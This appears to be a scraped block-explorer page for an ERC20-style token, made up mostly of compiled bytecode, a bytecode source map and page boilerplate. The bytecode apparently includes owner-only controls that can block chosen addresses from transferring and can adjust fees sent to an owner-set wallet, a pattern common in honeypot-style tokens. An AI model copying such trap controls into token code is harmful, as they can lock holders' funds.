b815260040161048990610ed7565b600e55565b600f54811461088b5760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b6044820152606401610489565b61089681600a611047565b600c5550565b6001600160a01b0383166108fe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610489565b6001600160a01b03821661095f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610489565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610a255760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610489565b6001600160a01b038216610a875760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610489565b6001600160a01b03831660009081526003602052604090205460ff16158015610ac957506001600160a01b03821660009081526003602052604090205460ff16155b610ad257600080fd5b610b0f81604051806060016040528060268152602001611083602691396001600160a01b0386166000908152600160205260409020549190610c40565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610b3e9082610c7a565b6001600160a01b038316600090815260016020526040902055600e54610b9290610b69606484610f41565b610b739190610f22565b6001600160a01b03841660009081526001602052604090205490610ce0565b6001600160a01b038316600090815260016020526040902055600c54610be890610bbd606484610f41565b610bc79190610f22565b6009546001600160a01b031660009081526001602052604090205490610c7a565b6009546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109b4565b60008184841115610c645760405162461bcd60e51b81526004016104899190610d22565b506000610c718486611053565b95945050505050565b600080610c87838561106a565b905083811015610cd95760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610489565b9392505050565b6000610cd983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c40565b600060208083528351808285015260005b81811015610d4f57858101830151858201604001528201610d33565b81811115610d61576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610d8e57600080fd5b919050565b60008060408385031215610da657600080fd5b610daf83610d77565b946020939093013593505050565b600060208284031215610dcf57600080fd5b5035919050565b600080600060608486031215610deb57600080fd5b610df484610d77565b9250610e0260208501610d77565b9150604084013590509250925092565b600060208284031215610e2457600080fd5b610cd982610d77565b60008060408385031215610e4057600080fd5b610e4983610d77565b915060208301358015158114610e5e57600080fd5b809150509250929050565b60008060408385031215610e7c57600080fd5b610e8583610d77565b9150610e9360208401610d77565b90509250929050565b600181811c90821680610eb057607f821691505b60208210811415610ed157634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610f3c57610f3c610f0c565b500290565b600082610f5e57634e487b7160e01b600052601260045260246000fd5b500490565b600181815b80851115610f9e578160001904821115610f8457610f84610f0c565b80851615610f9157918102915b93841c9390800290610f68565b509250929050565b600082610fb557506001610459565b81610fc257506000610459565b8160018114610fd85760028114610fe257610ffe565b6001915050610459565b60ff841115610ff357610ff3610f0c565b50506001821b610459565b5060208310610133831016604e8410600b8410161715611021575081810a610459565b61102b8383610f63565b806000190482111561103f5761103f610f0c565b029392505050565b6000610cd98383610fa6565b60008282101561106557611065610f0c565b500390565b6000821982111561107d5761107d610f0c565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205f4b7488c13bac8ebf540187d6af1b61185945435025a75e9dd1c48e2e7e1d2e64736f6c634300080a0033
Deployed Bytecode Sourcemap
12209:5691:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13777:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14716:153;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;14716:153:0;1053:187:1;12651:70:0;;;;;-1:-1:-1;;;;;12651:70:0;;;;;;-1:-1:-1;;;;;1409:32:1;;;1391:51;;1379:2;1364:18;12651:70:0;1245:203:1;13929:104:0;14015:12;;13929:104;;;1599:25:1;;;1587:2;1572:18;13929:104:0;1453:177:1;16297:233:0;;;;;;:::i;:::-;;:::i;:::-;;16042:245;;;;;;:::i;:::-;;:::i;14875:301::-;;;;;;:::i;:::-;;:::i;13471:96::-;13552:9;;;;13471:96;;;2325:4:1;2313:17;;;2295:36;;2283:2;2268:18;13471:96:0;2153:184:1;12574:22:0;;;;;;;;;15182:200;;;;;;:::i;:::-;;:::i;13086:26::-;;;;;;13169:32;;;;;;14087:123;;;;;;:::i;:::-;-1:-1:-1;;;;;14186:18:0;14163:7;14186:18;;;:9;:18;;;;;;;14087:123;12050:148;;;:::i;12726:48::-;;;;;;13316:96;13376:7;11812:6;-1:-1:-1;;;;;11812:6:0;13316:96;;12779:50;;;;;;13624:100;;;:::i;15390:251::-;;;;;;:::i;:::-;;:::i;14404:159::-;;;;;;:::i;:::-;;:::i;12601:21::-;;;:::i;15924:110::-;;;;;;:::i;:::-;;:::i;12627:19::-;;;:::i;15818:98::-;;;;;;:::i;:::-;;:::i;14571:139::-;;;;;;:::i;:::-;-1:-1:-1;;;;;14677:18:0;;;14654:7;14677:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14571:139;15652:158;;;;;;:::i;:::-;;:::i;13777:96::-;13833:13;13862:5;13855:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13777:96;:::o;14716:153::-;14793:4;14806:39;5590:10;14829:7;14838:6;14806:8;:39::i;:::-;-1:-1:-1;14859:4:0;14716:153;;;;;:::o;16297:233::-;11959:6;;-1:-1:-1;;;;;11959:6:0;5590:10;11959:22;11951:67;;;;-1:-1:-1;;;11951:67:0;;;;;;;:::i;:::-;;;;;;;;;16422:3:::1;16402:12;;16417:1;16402:16;;;;:::i;:::-;16401:24;;;;:::i;:::-;16390:6;:36;;16368:120;;;::::0;-1:-1:-1;;;16368:120:0;;4625:2:1;16368:120:0::1;::::0;::::1;4607:21:1::0;4664:2;4644:18;;;4637:30;4703:34;4683:18;;;4676:62;-1:-1:-1;;;4754:18:1;;;4747:32;4796:19;;16368:120:0::1;4423:398:1::0;16368:120:0::1;16499:14;:23:::0;16297:233::o;16042:245::-;11959:6;;-1:-1:-1;;;;;11959:6:0;5590:10;11959:22;11951:67;;;;-1:-1:-1;;;11951:67:0;;;;;;;:::i;:::-;16170:3:::1;16150:12;;16165:1;16150:16;;;;:::i;:::-;16149:24;;;;:::i;:::-;16138:6;:36;;16116:131;;;::::0;-1:-1:-1;;;16116:131:0;;5028:2:1;16116:131:0::1;::::0;::::1;5010:21:1::0;5067:2;5047:18;;;5040:30;5106:34;5086:18;;;5079:62;-1:-1:-1;;;5157:18:1;;;5150:43;5210:19;;16116:131:0::1;4826:409:1::0;16116:131:0::1;16258:12;:21:::0;16042:245::o;14875:301::-;14975:4;14988:36;14998:6;15006:9;15017:6;14988:9;:36::i;:::-;15031:121;15040:6;5590:10;15062:89;15100:6;15062:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15062:19:0;;;;;;:11;:19;;;;;;;;5590:10;15062:33;;;;;;;;;;:37;:89::i;:::-;15031:8;:121::i;:::-;-1:-1:-1;15166:4:0;14875:301;;;;;:::o;15182:200::-;5590:10;15262:4;15307:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;15307:34:0;;;;;;;;;;15262:4;;15275:83;;15298:7;;15307:50;;15346:10;15307:38;:50::i;12050:148::-;11959:6;;-1:-1:-1;;;;;11959:6:0;5590:10;11959:22;11951:67;;;;-1:-1:-1;;;11951:67:0;;;;;;;:::i;:::-;12132:1:::1;12115:19:::0;;-1:-1:-1;;;;;;12115:19:0::1;::::0;;12150:40:::1;::::0;12132:1;;12150:40:::1;::::0;12132:1;;12150:40:::1;12050:148::o:0;13624:100::-;13682:13;13711:7;13704:14;;;;;:::i;15390:251::-;15475:4;15488:129;5590:10;15511:7;15520:96;15559:15;15520:96;;;;;;;;;;;;;;;;;5590:10;15520:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;15520:34:0;;;;;;;;;;;;:38;:96::i;14404:159::-;14484:4;14497:42;5590:10;14521:9;14532:6;14497:9;:42::i;12601:21::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;15924:110::-;11959:6;;-1:-1:-1;;;;;11959:6:0;5590:10;11959:22;11951:67;;;;-1:-1:-1;;;11951:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15999:19:0;;;::::1;;::::0;;;:10:::1;:19;::::0;;;;:27;;-1:-1:-1;;15999:27:0::1;::::0;::::1;;::::0;;;::::1;::::0;;15924:110::o;12627:19::-;;;;;;;:::i;15818:98::-;11959:6;;-1:-1:-1;;;;;11959:6:0;5590:10;11959:22;11951:67;;;;-1:-1:-1;;;11951:67:0;;;;;;;:::i;:::-;15886:13:::1;:22:::0;15818:98::o;15652:158::-;15736:15;;15726:6;:25;15716:53;;;;-1:-1:-1;;;15716:53:0;;5442:2:1;15716:53:0;;;5424:21:1;5481:2;5461:18;;;5454:30;-1:-1:-1;;;5500:18:1;;;5493:43;5553:18;;15716:53:0;5240:337:1;15716:53:0;15790:12;15796:6;15790:2;:12;:::i;:::-;15780:7;:22;-1:-1:-1;15652:158:0:o;17577:320::-;-1:-1:-1;;;;;17667:19:0;;17659:68;;;;-1:-1:-1;;;17659:68:0;;7158:2:1;17659:68:0;;;7140:21:1;7197:2;7177:18;;;7170:30;7236:34;7216:18;;;7209:62;-1:-1:-1;;;7287:18:1;;;7280:34;7331:19;;17659:68:0;6956:400:1;17659:68:0;-1:-1:-1;;;;;17742:21:0;;17734:68;;;;-1:-1:-1;;;17734:68:0;;7563:2:1;17734:68:0;;;7545:21:1;7602:2;7582:18;;;7575:30;7641:34;7621:18;;;7614:62;-1:-1:-1;;;7692:18:1;;;7685:32;7734:19;;17734:68:0;7361:398:1;17734:68:0;-1:-1:-1;;;;;17811:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;17859:32;;1599:25:1;;;17859:32:0;;1572:18:1;17859:32:0;;;;;;;;17577:320;;;:::o;16536:726::-;-1:-1:-1;;;;;16642:20:0;;16634:70;;;;-1:-1:-1;;;16634:70:0;;7966:2:1;16634:70:0;;;7948:21:1;8005:2;7985:18;;;7978:30;8044:34;8024:18;;;8017:62;-1:-1:-1;;;8095:18:1;;;8088:35;8140:19;;16634:70:0;7764:401:1;16634:70:0;-1:-1:-1;;;;;16723:23:0;;16715:71;;;;-1:-1:-1;;;16715:71:0;;8372:2:1;16715:71:0;;;8354:21:1;8411:2;8391:18;;;8384:30;8450:34;8430:18;;;8423:62;-1:-1:-1;;;8501:18:1;;;8494:33;8544:19;;16715:71:0;8170:399:1;16715:71:0;-1:-1:-1;;;;;16806:18:0;;;;;;:10;:18;;;;;;;;16805:19;:45;;;;-1:-1:-1;;;;;;16829:21:0;;;;;;:10;:21;;;;;;;;16828:22;16805:45;16797:54;;;;;;16884:71;16906:6;16884:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16884:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;16864:17:0;;;;;;;:9;:17;;;;;;:91;;;;16989:20;;;;;;;:32;;17014:6;16989:24;:32::i;:::-;-1:-1:-1;;;;;16966:20:0;;;;;;:9;:20;;;;;:55;17095:13;;17055:54;;17080:12;17089:3;17080:6;:12;:::i;:::-;:28;;;;:::i;:::-;-1:-1:-1;;;;;17055:20:0;;;;;;:9;:20;;;;;;;:24;:54::i;:::-;-1:-1:-1;;;;;17032:20:0;;;;;;:9;:20;;;;;:77;17185:7;;17144:49;;17170:12;17179:3;17170:6;:12;:::i;:::-;:22;;;;:::i;:::-;17154:10;;-1:-1:-1;;;;;17154:10:0;17144:21;;;;:9;:21;;;;;;;:25;:49::i;:::-;17130:10;;-1:-1:-1;;;;;17130:10:0;;;17120:21;;;;:9;:21;;;;;;;;;:73;;;;17209:35;1599:25:1;;;17209:35:0;;;;;;;;;;1572:18:1;17209:35:0;1453:177:1;7376:178:0;7462:7;7494:12;7486:6;;;;7478:29;;;;-1:-1:-1;;;7478:29:0;;;;;;;;:::i;:::-;-1:-1:-1;7514:9:0;7526:5;7530:1;7526;:5;:::i;:::-;7514:17;7376:178;-1:-1:-1;;;;;7376:178:0:o;6549:167::-;6607:7;;6635:5;6639:1;6635;:5;:::i;:::-;6623:17;;6660:1;6655;:6;;6647:46;;;;-1:-1:-1;;;6647:46:0;;9039:2:1;6647:46:0;;;9021:21:1;9078:2;9058:18;;;9051:30;9117:29;9097:18;;;9090:57;9164:18;;6647:46:0;8837:351:1;6647:46:0;6709:1;6549:167;-1:-1:-1;;;6549:167:0:o;6971:130::-;7029:7;7052:43;7056:1;7059;7052:43;;;;;;;;;;;;;;;;;:3;:43::i;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1635:180::-;1694:6;1747:2;1735:9;1726:7;1722:23;1718:32;1715:52;;;1763:1;1760;1753:12;1715:52;-1:-1:-1;1786:23:1;;1635:180;-1:-1:-1;1635:180:1:o;1820:328::-;1897:6;1905;1913;1966:2;1954:9;1945:7;1941:23;1937:32;1934:52;;;1982:1;1979;1972:12;1934:52;2005:29;2024:9;2005:29;:::i;:::-;1995:39;;2053:38;2087:2;2076:9;2072:18;2053:38;:::i;:::-;2043:48;;2138:2;2127:9;2123:18;2110:32;2100:42;;1820:328;;;;;:::o;2342:186::-;2401:6;2454:2;2442:9;2433:7;2429:23;2425:32;2422:52;;;2470:1;2467;2460:12;2422:52;2493:29;2512:9;2493:29;:::i;2533:347::-;2598:6;2606;2659:2;2647:9;2638:7;2634:23;2630:32;2627:52;;;2675:1;2672;2665:12;2627:52;2698:29;2717:9;2698:29;:::i;:::-;2688:39;;2777:2;2766:9;2762:18;2749:32;2824:5;2817:13;2810:21;2803:5;2800:32;2790:60;;2846:1;2843;2836:12;2790:60;2869:5;2859:15;;;2533:347;;;;;:::o;2885:260::-;2953:6;2961;3014:2;3002:9;2993:7;2989:23;2985:32;2982:52;;;3030:1;3027;3020:12;2982:52;3053:29;3072:9;3053:29;:::i;:::-;3043:39;;3101:38;3135:2;3124:9;3120:18;3101:38;:::i;:::-;3091:48;;2885:260;;;;;:::o;3150:380::-;3229:1;3225:12;;;;3272;;;3293:61;;3347:4;3339:6;3335:17;3325:27;;3293:61;3400:2;3392:6;3389:14;3369:18;3366:38;3363:161;;;3446:10;3441:3;3437:20;3434:1;3427:31;3481:4;3478:1;3471:15;3509:4;3506:1;3499:15;3363:161;;3150:380;;;:::o;3535:356::-;3737:2;3719:21;;;3756:18;;;3749:30;3815:34;3810:2;3795:18;;3788:62;3882:2;3867:18;;3535:356::o;3896:127::-;3957:10;3952:3;3948:20;3945:1;3938:31;3988:4;3985:1;3978:15;4012:4;4009:1;4002:15;4028:168;4068:7;4134:1;4130;4126:6;4122:14;4119:1;4116:21;4111:1;4104:9;4097:17;4093:45;4090:71;;;4141:18;;:::i;:::-;-1:-1:-1;4181:9:1;;4028:168::o;4201:217::-;4241:1;4267;4257:132;;4311:10;4306:3;4302:20;4299:1;4292:31;4346:4;4343:1;4336:15;4374:4;4371:1;4364:15;4257:132;-1:-1:-1;4403:9:1;;4201:217::o;5582:422::-;5671:1;5714:5;5671:1;5728:270;5749:7;5739:8;5736:21;5728:270;;;5808:4;5804:1;5800:6;5796:17;5790:4;5787:27;5784:53;;;5817:18;;:::i;:::-;5867:7;5857:8;5853:22;5850:55;;;5887:16;;;;5850:55;5966:22;;;;5926:15;;;;5728:270;;;5732:3;5582:422;;;;;:::o;6009:806::-;6058:5;6088:8;6078:80;;-1:-1:-1;6129:1:1;6143:5;;6078:80;6177:4;6167:76;;-1:-1:-1;6214:1:1;6228:5;;6167:76;6259:4;6277:1;6272:59;;;;6345:1;6340:130;;;;6252:218;;6272:59;6302:1;6293:10;;6316:5;;;6340:130;6377:3;6367:8;6364:17;6361:43;;;6384:18;;:::i;:::-;-1:-1:-1;;6440:1:1;6426:16;;6455:5;;6252:218;;6554:2;6544:8;6541:16;6535:3;6529:4;6526:13;6522:36;6516:2;6506:8;6503:16;6498:2;6492:4;6489:12;6485:35;6482:77;6479:159;;;-1:-1:-1;6591:19:1;;;6623:5;;6479:159;6670:34;6695:8;6689:4;6670:34;:::i;:::-;6740:6;6736:1;6732:6;6728:19;6719:7;6716:32;6713:58;;;6751:18;;:::i;:::-;6789:20;;6009:806;-1:-1:-1;;;6009:806:1:o;6820:131::-;6880:5;6909:36;6936:8;6930:4;6909:36;:::i;8574:125::-;8614:4;8642:1;8639;8636:8;8633:34;;;8647:18;;:::i;:::-;-1:-1:-1;8684:9:1;;8574:125::o;8704:128::-;8744:3;8775:1;8771:6;8768:1;8765:13;8762:39;;;8781:18;;:::i;:::-;-1:-1:-1;8817:9:1;;8704:128::o
Swarm Source
ipfs://5f4b7488c13bac8ebf540187d6af1b61185945435025a75e9dd1c48e2e7e1d2e
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.